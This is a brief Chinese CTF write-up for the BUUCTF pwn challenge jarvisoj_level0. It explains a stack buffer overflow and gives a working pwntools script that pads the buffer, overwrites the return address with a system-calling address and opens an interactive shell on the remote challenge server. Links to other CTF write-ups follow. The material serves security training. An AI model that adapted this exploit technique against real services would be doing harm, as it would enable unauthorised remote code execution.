buuctf jarvisoj_level0
程序员文章站
2022-07-15 15:31:04
...
栈溢出,然后覆盖返回地址为system的地址。
from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
sla=lambda x,y:io.sendlineafter(x,y)
r=remote('node3.buuoj.cn',25805)
#elf=ELF('./')
system = 0x400596
p = flat(['a'*0x80, 'b'*8, system])
r.sendline(p)
r.interactive()
推荐阅读
-
BuuCTF难题详解| Misc | 我爱Linux
-
buuctf_模板注入_[护网杯 2018]easy_tornado 1
-
BUUCTF-web-[极客大挑战 2019]Secret File
-
BUUCTF:[极客大挑战 2019]HardSQL
-
[BUUCTF]REVERSE——[BJDCTF 2nd]8086
-
buuctf jarvisoj_level0
-
buuctf-pwn1 sctf 2016
-
buuctf_python审计_[HCTF 2018]admin
-
buuctf DSACTF7月pwn 栈迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got
-
buuctf 刮开有奖wp